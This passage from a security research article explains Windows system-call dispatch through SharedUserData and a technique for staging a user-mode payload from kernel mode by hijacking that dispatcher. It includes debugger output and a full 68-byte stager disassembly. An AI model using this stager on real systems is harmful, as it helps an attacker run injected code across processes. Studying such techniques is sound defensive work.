|Informative Information for the Uninformed|
One particularly useful approach to staging a R3 payload from R0 is to hijack the system call dispatcher at R3. To accomplish this, one must have an understanding of the basic mechanism through which system calls are dispatched in user-mode. Prior to Windows XP, system calls were dispatched through the soft-interrupt 0x2e. As such, the method described in this subsection will not work on Windows 2000. However, starting with XP SP0, the system call interface was changed to support using processor-specific instructions for system calls, such as sysenter or syscall.
To support this, Microsoft added fields to the KUSER_SHARED_DATA structure, which is symbolically known as SharedUserData, that held instructions for issuing a system call. These instructions were placed at offset 0x300 by the kernel and took a form like the code shown below:
kd> dt _KUSER_SHARED_DATA 0x7ffe0000 ... +0x300 SystemCall :  0xc819cc3`340fd48b kd> u SharedUserData!SystemCallStub L3 SharedUserData!SystemCallStub: 7ffe0300 8bd4 mov edx,esp 7ffe0302 0f34 sysenter 7ffe0304 c3 ret
To make use of this dynamic code block, each system call stub in ntdll.dll was implemented to make a call into the instructions found at that location.
ntdll!ZwAllocateVirtualMemory: 77f7e4c3 b811000000 mov eax,0x11 77f7e4c8 ba0003fe7f mov edx,0x7ffe0300 77f7e4cd ffd2 call edx
Due to the fact that SharedUserData contained executable instructions, it was thus necessary that the SharedUserData mapping had to be marked as executable. When Microsoft began work on some of the security enhancements included with XP SP2 and 2003 SP1, such as Data Execution Prevention (DEP), they presumably realized that leaving SharedUserData executable was largely unnecessary and that doing so left open the possibility for abuse. To address this, the fields in KUSER_SHARED_DATA were changed from sets of instructions to function pointers that resided within ntdll.dll. The output below shows this change:
+0x300 SystemCall : 0x7c90eb8b +0x304 SystemCallReturn : 0x7c90eb94 +0x308 SystemCallPad :  0
To make use of the function pointers, each system call stub was changed to issue an indirect call through the SystemCall function pointer:
ntdll!ZwAllocateVirtualMemory: 7c90d4de b811000000 mov eax,0x11 7c90d4e3 ba0003fe7f mov edx,0x7ffe0300 7c90d4e8 ff12 call dword ptr [edx]
The importance behind the approaches taken to issue system calls is that it is possible to take advantage of the way in which the system call dispatching interfaces have been implemented. These interfaces can be manipulated in a manner that allows a payload to be staged from R0 to R3 with very little overhead. The basic idea behind this approach is that a R3 payload is layered in between the system call stubs and the kernel. The R3 payload then gets an opportunity to run prior to a system call being issued within the context of an arbitrary process.
This approach has quite a few advantages. First, the size of the staging payload is relatively small because it requires no symbol resolution or other means of directly scheduling the execution of code in an arbitrary or specific process. Second, the staging mechanism is inherently IRQL-safe because SharedUserData cannot be paged out. This benefit makes it such that a migration technique does not have to be employed in order to get the R0 payload to a safe IRQL.
One of the disadvantages of the payload outlined below is that it relies on SharedUserData being executable. However, it should be trivial to alter the PTE for SharedUserData to set the execute bit if necessary, thus eliminating the DEP concern.
Another thing to keep in mind about this stager is that the R3 payload must be written in a manner that allows it to be re-entrant. Since the R3 payload is layered between user-mode and kernel-mode for system call dispatching, it can be assumed that the payload will get called many times in many different process contexts. It is up to the R3 payload to figure out when it should do its magic and when it should not.
The following steps outline one way in which a stager of this type could be implemented.
The following code illustrates an implementation of this type of staging payload. It's roughly 68 bytes in size, excluding the R3 payload and the recovery method.
00000000 EB3F jmp short 0x41 00000002 BB0103DFFF mov ebx,0xffdf0301 00000007 4B dec ebx 00000008 FC cld 00000009 8D7B7C lea edi,[ebx+0x7c] 0000000C 5E pop esi 0000000D 57 push edi 0000000E 6A01 push byte +0x1 ; number of dwords to copy 00000010 59 pop ecx 00000011 F3A5 rep movsd 00000013 B88BD4B902 mov eax,0x2b9d48b 00000018 663903 cmp [ebx],ax 0000001B 7511 jnz 0x2e 0000001D AB stosd 0000001E B803FE7FFF mov eax,0xff7ffe03 00000023 AB stosd 00000024 B0E1 mov al,0xe1 00000026 AA stosb 00000027 66C703EB7A mov word [ebx],0x7aeb 0000002C 5F pop edi 0000002D C3 ret ; substitute with recovery method 0000002E 8B03 mov eax,[ebx] 00000030 8D4B08 lea ecx,[ebx+0x8] 00000033 8901 mov [ecx],eax 00000035 66C707FF25 mov word [edi],0x25ff 0000003A 894F02 mov [edi+0x2],ecx 0000003D 5F pop edi 0000003E 893B mov [ebx],edi 00000040 C3 ret ; substitute with recovery method 00000041 E8BCFFFFFF call 0x2 ... R3 payload here ...